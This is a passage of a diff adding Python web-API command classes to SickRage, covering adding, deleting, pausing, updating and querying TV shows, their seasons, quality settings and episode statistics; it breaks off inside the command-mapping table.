""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""]) + self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", + bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", []) + self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", int(sickbeard.USE_SUBTITLES), + False, ""int"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Add an existing show in SickRage """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if show_obj: + return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in the database"") + + if not ek(os.path.isdir, self.location): + return _responds(RESULT_FAILURE, msg='Not a valid location') + + indexer_name = None + indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run() + + if indexer_result['result'] == result_type_map[RESULT_SUCCESS]: + if not indexer_result['data']['results']: + return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"") + if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]: + indexer_name = indexer_result['data']['results'][0]['name'] + + if not indexer_name: + return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"") + + # set indexer so we can pass it along when adding show to SR + indexer = indexer_result['data']['results'][0]['indexer'] + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + # use default quality as a fail-safe + new_quality = int(sickbeard.QUALITY_DEFAULT) + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + new_quality = Quality.combineQualities(i_quality_id, a_quality_id) + + sickbeard.showQueueScheduler.action.addShow( + int(indexer), int(self.indexerid), self.location, default_status=sickbeard.STATUS_DEFAULT, + quality=new_quality, flatten_folders=int(self.flatten_folders), subtitles=self.subtitles, + default_status_after=sickbeard.STATUS_DEFAULT_AFTER, archive=self.archive_firstmatch + ) + + return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"") + + +class CMD_ShowAddNew(ApiCall): + _help = { + ""desc"": ""Add a new show to SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""initial"": {""desc"": ""The initial quality of the show""}, + ""location"": {""desc"": ""The path to the folder where the show should be created""}, + ""archive"": {""desc"": ""The archive quality of the show""}, + ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""}, + ""status"": {""desc"": ""The status of missing episodes""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""}, + ""anime"": {""desc"": ""True to mark the show as an anime, False otherwise""}, + ""scene"": {""desc"": ""True if episodes search should be made by scene numbering, False otherwise""}, + ""future_status"": {""desc"": ""The status of future episodes""}, + ""archive_firstmatch"": { + ""desc"": ""True if episodes should be archived when first match is downloaded, False otherwise"" + }, + } + } + + def __init__(self, args, kwargs): + self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id'] + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.location, args = self.check_params(args, kwargs, ""location"", None, False, ""string"", []) + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""]) + self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", + bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", []) + self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"", + [""wanted"", ""skipped"", ""ignored""]) + self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"", + self.valid_languages.keys()) + self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", bool(sickbeard.USE_SUBTITLES), + False, ""bool"", []) + self.anime, args = self.check_params(args, kwargs, ""anime"", bool(sickbeard.ANIME_DEFAULT), False, + ""bool"", []) + self.scene, args = self.check_params(args, kwargs, ""scene"", bool(sickbeard.SCENE_DEFAULT), False, + ""bool"", []) + self.future_status, args = self.check_params(args, kwargs, ""future_status"", None, False, ""string"", + [""wanted"", ""skipped"", ""ignored""]) + self.archive_firstmatch, args = self.check_params(args, kwargs, ""archive_firstmatch"", + bool(sickbeard.ARCHIVE_DEFAULT), False, ""bool"", []) + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Add a new show to SickRage """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if show_obj: + return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in database"") + + if not self.location: + if sickbeard.ROOT_DIRS != """": + root_dirs = sickbeard.ROOT_DIRS.split('|') + root_dirs.pop(0) + default_index = int(sickbeard.ROOT_DIRS.split('|')[0]) + self.location = root_dirs[default_index] + else: + return _responds(RESULT_FAILURE, msg=""Root directory is not set, please provide a location"") + + if not ek(os.path.isdir, self.location): + return _responds(RESULT_FAILURE, msg=""'"" + self.location + ""' is not a valid location"") + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + # use default quality as a fail-safe + new_quality = int(sickbeard.QUALITY_DEFAULT) + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + new_quality = Quality.combineQualities(i_quality_id, a_quality_id) + + # use default status as a fail-safe + new_status = sickbeard.STATUS_DEFAULT + if self.status: + # convert the string status to a int + for status in statusStrings: + if statusStrings[status].lower() == str(self.status).lower(): + self.status = status + break + + if self.status not in statusStrings: + raise ApiError(""Invalid Status"") + + # only allow the status options we want + if int(self.status) not in (WANTED, SKIPPED, IGNORED): + return _responds(RESULT_FAILURE, msg=""Status prohibited"") + new_status = self.status + + # use default status as a fail-safe + default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER + if self.future_status: + # convert the string status to a int + for status in statusStrings: + if statusStrings[status].lower() == str(self.future_status).lower(): + self.future_status = status + break + + if self.future_status not in statusStrings: + raise ApiError(""Invalid Status"") + + # only allow the status options we want + if int(self.future_status) not in (WANTED, SKIPPED, IGNORED): + return _responds(RESULT_FAILURE, msg=""Status prohibited"") + default_ep_status_after = self.future_status + + indexer_name = None + indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run() + + if indexer_result['result'] == result_type_map[RESULT_SUCCESS]: + if not indexer_result['data']['results']: + return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"") + if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]: + indexer_name = indexer_result['data']['results'][0]['name'] + + if not indexer_name: + return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"") + + # set indexer for found show so we can pass it along + indexer = indexer_result['data']['results'][0]['indexer'] + + # moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors + show_path = ek(os.path.join, self.location, sanitize_filename(indexer_name)) + + # don't create show dir if config says not to + if sickbeard.ADD_SHOWS_WO_DIR: + logger.log(u""Skipping initial creation of "" + show_path + "" due to config.ini setting"") + else: + dir_exists = helpers.makeDir(show_path) + if not dir_exists: + logger.log(u""API :: Unable to create the folder "" + show_path + "", can't add the show"", logger.ERROR) + return _responds(RESULT_FAILURE, {""path"": show_path}, + ""Unable to create the folder "" + show_path + "", can't add the show"") + else: + helpers.chmodAsParent(show_path) + + sickbeard.showQueueScheduler.action.addShow( + int(indexer), int(self.indexerid), show_path, default_status=new_status, quality=new_quality, + flatten_folders=int(self.flatten_folders), lang=self.lang, subtitles=self.subtitles, anime=self.anime, + scene=self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch + ) + + return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"") + + +class CMD_ShowCache(ApiCall): + _help = { + ""desc"": ""Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # TODO: catch if cache dir is missing/invalid.. so it doesn't break show/show.cache + # return {""poster"": 0, ""banner"": 0} + + cache_obj = image_cache.ImageCache() + + has_poster = 0 + has_banner = 0 + + if ek(os.path.isfile, cache_obj.poster_path(show_obj.indexerid)): + has_poster = 1 + if ek(os.path.isfile, cache_obj.banner_path(show_obj.indexerid)): + has_banner = 1 + + return _responds(RESULT_SUCCESS, {""poster"": has_poster, ""banner"": has_banner}) + + +class CMD_ShowDelete(ApiCall): + _help = { + ""desc"": ""Delete a show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""removefiles"": { + ""desc"": ""True to delete the files associated with the show, False otherwise. This can not be undone!"" + }, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.removefiles, args = self.check_params(args, kwargs, ""removefiles"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Delete a show in SickRage """""" + error, show = Show.delete(self.indexerid, self.removefiles) + + if error: + return _responds(RESULT_FAILURE, msg=error) + + return _responds(RESULT_SUCCESS, msg='%s has been queued to be deleted' % show.name) + + +class CMD_ShowGetQuality(ApiCall): + _help = { + ""desc"": ""Get the quality setting of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the quality setting of a show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + any_qualities, best_qualities = _map_quality(show_obj.quality) + + return _responds(RESULT_SUCCESS, {""initial"": any_qualities, ""archive"": best_qualities}) + + +class CMD_ShowGetPoster(ApiCall): + _help = { + ""desc"": ""Get the poster of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the poster a show """""" + return { + 'outputType': 'image', + 'image': ShowPoster(self.indexerid), + } + + +class CMD_ShowGetBanner(ApiCall): + _help = { + ""desc"": ""Get the banner of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the banner of a show """""" + return { + 'outputType': 'image', + 'image': ShowBanner(self.indexerid), + } + + +class CMD_ShowGetNetworkLogo(ApiCall): + _help = { + ""desc"": ""Get the network logo of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" + :return: Get the network logo of a show + """""" + return { + 'outputType': 'image', + 'image': ShowNetworkLogo(self.indexerid), + } + + +class CMD_ShowGetFanArt(ApiCall): + _help = { + ""desc"": ""Get the fan art of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the fan art of a show """""" + return { + 'outputType': 'image', + 'image': ShowFanArt(self.indexerid), + } + + +class CMD_ShowPause(ApiCall): + _help = { + ""desc"": ""Pause or un-pause a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""pause"": {""desc"": ""True to pause the show, False otherwise""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Pause or un-pause a show """""" + error, show = Show.pause(self.indexerid, self.pause) + + if error: + return _responds(RESULT_FAILURE, msg=error) + + return _responds(RESULT_SUCCESS, msg='%s has been %s' % (show.name, ('resumed', 'paused')[show.paused])) + + +class CMD_ShowRefresh(ApiCall): + _help = { + ""desc"": ""Refresh a show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Refresh a show in SickRage """""" + error, show = Show.refresh(self.indexerid) + + if error: + return _responds(RESULT_FAILURE, msg=error) + + return _responds(RESULT_SUCCESS, msg='%s has queued to be refreshed' % show.name) + + +class CMD_ShowSeasonList(ApiCall): + _help = { + ""desc"": ""Get the list of seasons of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""sort"": {""desc"": ""Return the seasons in ascending or descending order""} + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.sort, args = self.check_params(args, kwargs, ""sort"", ""desc"", False, ""string"", [""asc"", ""desc""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the list of seasons of a show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + my_db = db.DBConnection(row_type=""dict"") + if self.sort == ""asc"": + sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC"", + [self.indexerid]) + else: + sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC"", + [self.indexerid]) + season_list = [] # a list with all season numbers + for row in sql_results: + season_list.append(int(row[""season""])) + + return _responds(RESULT_SUCCESS, season_list) + + +class CMD_ShowSeasons(ApiCall): + _help = { + ""desc"": ""Get the list of episodes for one or all seasons of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.season, args = self.check_params(args, kwargs, ""season"", None, False, ""int"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the list of episodes for one or all seasons of a show """""" + sho_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not sho_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + my_db = db.DBConnection(row_type=""dict"") + + if self.season is None: + sql_results = my_db.select( + ""SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?"", + [self.indexerid]) + seasons = {} + for row in sql_results: + status, quality = Quality.splitCompositeStatus(int(row[""status""])) + row[""status""] = _get_status_strings(status) + row[""quality""] = get_quality_string(quality) + if helpers.tryInt(row['airdate'], 1) > 693595: # 1900 + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network)) + row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + row['airdate'] = 'Never' + cur_season = int(row[""season""]) + cur_episode = int(row[""episode""]) + del row[""season""] + del row[""episode""] + if cur_season not in seasons: + seasons[cur_season] = {} + seasons[cur_season][cur_episode] = row + + else: + sql_results = my_db.select( + ""SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND season = ?"", + [self.indexerid, self.season]) + if len(sql_results) == 0: + return _responds(RESULT_FAILURE, msg=""Season not found"") + seasons = {} + for row in sql_results: + cur_episode = int(row[""episode""]) + del row[""episode""] + status, quality = Quality.splitCompositeStatus(int(row[""status""])) + row[""status""] = _get_status_strings(status) + row[""quality""] = get_quality_string(quality) + if helpers.tryInt(row['airdate'], 1) > 693595: # 1900 + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network)) + row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + row['airdate'] = 'Never' + if cur_episode not in seasons: + seasons[cur_episode] = {} + seasons[cur_episode] = row + + return _responds(RESULT_SUCCESS, seasons) + + +class CMD_ShowSetQuality(ApiCall): + _help = { + ""desc"": ""Set the quality setting of a show. If no quality is provided, the default user setting is used."", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""initial"": {""desc"": ""The initial quality of the show""}, + ""archive"": {""desc"": ""The archive quality of the show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere. + # self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", _get_quality_map().values()[1:]) + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", + ""hdbluray"", ""fullhdbluray""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Set the quality setting of a show. If no quality is provided, the default user setting is used. """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + # use default quality as a fail-safe + new_quality = int(sickbeard.QUALITY_DEFAULT) + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + new_quality = Quality.combineQualities(i_quality_id, a_quality_id) + show_obj.quality = new_quality + + return _responds(RESULT_SUCCESS, + msg=show_obj.name + "" quality has been changed to "" + get_quality_string(show_obj.quality)) + + +class CMD_ShowStats(ApiCall): + _help = { + ""desc"": ""Get episode statistics for a given show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get episode statistics for a given show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # show stats + episode_status_counts_total = {""total"": 0} + for status in statusStrings: + if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]: + continue + episode_status_counts_total[status] = 0 + + # add all the downloaded qualities + episode_qualities_counts_download = {""total"": 0} + for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED: + status, quality = Quality.splitCompositeStatus(statusCode) + if quality in [Quality.NONE]: + continue + episode_qualities_counts_download[statusCode] = 0 + + # add all snatched qualities + episode_qualities_counts_snatch = {""total"": 0} + for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER: + status, quality = Quality.splitCompositeStatus(statusCode) + if quality in [Quality.NONE]: + continue + episode_qualities_counts_snatch[statusCode] = 0 + + my_db = db.DBConnection(row_type=""dict"") + sql_results = my_db.select(""SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?"", + [self.indexerid]) + # the main loop that goes through all episodes + for row in sql_results: + status, quality = Quality.splitCompositeStatus(int(row[""status""])) + + episode_status_counts_total[""total""] += 1 + + if status in Quality.DOWNLOADED + Quality.ARCHIVED: + episode_qualities_counts_download[""total""] += 1 + episode_qualities_counts_download[int(row[""status""])] += 1 + elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER: + episode_qualities_counts_snatch[""total""] += 1 + episode_qualities_counts_snatch[int(row[""status""])] += 1 + elif status == 0: # we don't count NONE = 0 = N/A + pass + else: + episode_status_counts_total[status] += 1 + + # the outgoing container + episodes_stats = {""downloaded"": {}} + # turning codes into strings + for statusCode in episode_qualities_counts_download: + if statusCode == ""total"": + episodes_stats[""downloaded""][""total""] = episode_qualities_counts_download[statusCode] + continue + status, quality = Quality.splitCompositeStatus(int(statusCode)) + status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """") + episodes_stats[""downloaded""][status_string] = episode_qualities_counts_download[statusCode] + + episodes_stats[""snatched""] = {} + # turning codes into strings + # and combining proper and normal + for statusCode in episode_qualities_counts_snatch: + if statusCode == ""total"": + episodes_stats[""snatched""][""total""] = episode_qualities_counts_snatch[statusCode] + continue + status, quality = Quality.splitCompositeStatus(int(statusCode)) + status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """") + if Quality.qualityStrings[quality] in episodes_stats[""snatched""]: + episodes_stats[""snatched""][status_string] += episode_qualities_counts_snatch[statusCode] + else: + episodes_stats[""snatched""][status_string] = episode_qualities_counts_snatch[statusCode] + + # episodes_stats[""total""] = {} + for statusCode in episode_status_counts_total: + if statusCode == ""total"": + episodes_stats[""total""] = episode_status_counts_total[statusCode] + continue + status, quality = Quality.splitCompositeStatus(int(statusCode)) + status_string = statusStrings[statusCode].lower().replace("" "", ""_"").replace(""("", """").replace( + "")"", """") + episodes_stats[status_string] = episode_status_counts_total[statusCode] + + return _responds(RESULT_SUCCESS, episodes_stats) + + +class CMD_ShowUpdate(ApiCall): + _help = { + ""desc"": ""Update a show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Update a show in SickRage """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + try: + sickbeard.showQueueScheduler.action.updateShow(show_obj, True) # @UndefinedVariable + return _responds(RESULT_SUCCESS, msg=str(show_obj.name) + "" has queued to be updated"") + except CantUpdateShowException as e: + logger.log(u""API::Unable to update show: {0}"".format(str(e)), logger.DEBUG) + return _responds(RESULT_FAILURE, msg=""Unable to update "" + str(show_obj.name)) + + +class CMD_Shows(ApiCall): + _help = { + ""desc"": ""Get all shows in SickRage"", + ""optionalParameters"": { + ""sort"": {""desc"": ""The sorting strategy to apply to the list of shows""}, + ""paused"": {""desc"": ""True to include paused shows, False otherwise""}, + }, + } + + def __init__(self, args, kwargs): + # required + # optional + self.sort, args = self.check_params(args, kwargs, ""sort"", ""id"", False, ""string"", [""id"", ""name""]) + self.paused, args = self.check_params(args, kwargs, ""paused"", None, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get all shows in SickRage """""" + shows = {} + for curShow in sickbeard.showList: + + if not self.paused and curShow.paused: # If we're not including paused shows, and the current show is paused + continue # continue with the next show + + indexer_show = helpers.mapIndexersToShow(curShow) + + show_dict = { + ""paused"": (0, 1)[curShow.paused], + ""quality"": get_quality_string(curShow.quality), + ""language"": curShow.lang, + ""air_by_date"": (0, 1)[curShow.air_by_date], + ""sports"": (0, 1)[curShow.sports], + ""anime"": (0, 1)[curShow.anime], + ""indexerid"": curShow.indexerid, + ""tvdbid"": indexer_show[1], + ""network"": curShow.network, + ""show_name"": curShow.name, + ""status"": curShow.status, + ""subtitles"": (0, 1)[curShow.subtitles], + } + + if helpers.tryInt(curShow.nextaired, 1) > 693595: # 1900 + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(curShow.nextaired, curShow.airs, show_dict['network'])) + show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + show_dict['next_ep_airdate'] = '' + + show_dict[""cache""] = CMD_ShowCache((), {""indexerid"": curShow.indexerid}).run()[""data""] + if not show_dict[""network""]: + show_dict[""network""] = """" + if self.sort == ""name"": + shows[curShow.name] = show_dict + else: + shows[curShow.indexerid] = show_dict + + return _responds(RESULT_SUCCESS, shows) + + +class CMD_ShowsStats(ApiCall): + _help = {""desc"": ""Get the global shows and episodes statistics""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the global shows and episodes statistics """""" + stats = Show.overall_stats() + + return _responds(RESULT_SUCCESS, { + 'ep_downloaded': stats['episodes']['downloaded'], + 'ep_snatched': stats['episodes']['snatched'], + 'ep_total': stats['episodes']['total'], + 'shows_active': stats['shows']['active'], + 'shows_total': stats['shows']['total'], + }) + + +# WARNING: never define a cmd call string that contains a ""_"" (underscore) +# this is reserved for cmd indexes used while cmd chaining + +# WARNING: never define a param name that contains a ""."" (dot) +# this is reserved for cmd namespaces used while cmd chaining +function_mapper = { + ""help"": CMD_Help, + ""future"": CMD_ComingEpisodes, + ""episode"": CMD_Episode, + ""episode.search"": CMD_EpisodeSearch, + ""episode.setstatus"": CMD_EpisodeSetStatus, + ""episode.subtitlesearch"": CMD_SubtitleSearch, + ""exceptions"": CMD_Exceptions, + 